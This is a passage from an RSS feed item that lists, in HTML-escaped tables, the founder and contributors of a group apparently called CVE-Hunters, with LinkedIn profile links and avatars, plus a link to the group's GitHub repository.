    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/samara.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/taiza.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/thiago.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;Samara&amp;lt;br&amp;gt;Gama&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;Taíza&amp;lt;br&amp;gt;Oliveira&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;Thiago&amp;lt;br&amp;gt;Escarrone&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vanderlei.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/viniciusCastro.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vinicius.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;Vanderlei&amp;lt;br&amp;gt;Princival&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;Vinicius&amp;lt;br&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;Vinícius&amp;lt;br&amp;gt;Melfi&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/yago.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;Yago&amp;lt;br&amp;gt;Dyogennes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;repository&amp;#34;&amp;gt;Repository
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/team/cve-hunters-logo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;Official &amp;lt;br&amp;gt; Repository&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;You can find useful repositories and contributors links below:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;founder&amp;#34;&amp;gt;Founder
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/natan.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;Natan Maia&amp;lt;br /&amp;gt; Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/angelo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/diego.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/elisangela.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;Angelo&amp;lt;br /&amp;gt;Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;Diego&amp;lt;br /&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;Elisângela&amp;lt;br /&amp;gt;Mendonça&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/isadora.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/itauan.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;Fernanda&amp;lt;br /&amp;gt;Martins&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;Isadora&amp;lt;br /&amp;gt;Novaes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;Itauan&amp;lt;br /&amp;gt;Santos&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/karina.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcelo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcos.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;Karina&amp;lt;br /&amp;gt;Gante&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;Marcelo&amp;lt;br /&amp;gt;Queiroz&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;Marcos&amp;lt;br /&amp;gt;Tolosa&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/pedro.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/rafael.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/raul.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;Pedro&amp;lt;br /&amp;gt;Lyrio&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;Rafael&amp;lt;br /&amp;gt;Corvino&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;Raul&amp;lt;br /&amp;gt;Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/samara.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/taiza.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/thiago.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;Samara&amp;lt;br /&amp;gt;Gama&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;Taíza&amp;lt;br /&amp;gt;Oliveira&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;Thiago&amp;lt;br /&amp;gt;Escarrone&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vanderlei.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/viniciusCastro.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vinicius.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;Vanderlei&amp;lt;br /&amp;gt;Princival&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;Vinicius&amp;lt;br /&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;Vinícius&amp;lt;br /&amp;gt;Melfi&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/yago.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;Yago&amp;lt;br /&amp;gt;Dyogennes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;repository&amp;#34;&amp;gt;Repository
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/team/cve-hunters-logo.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;Official &amp;lt;br /&amp;gt; Repository&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
  </channel>
</rss>
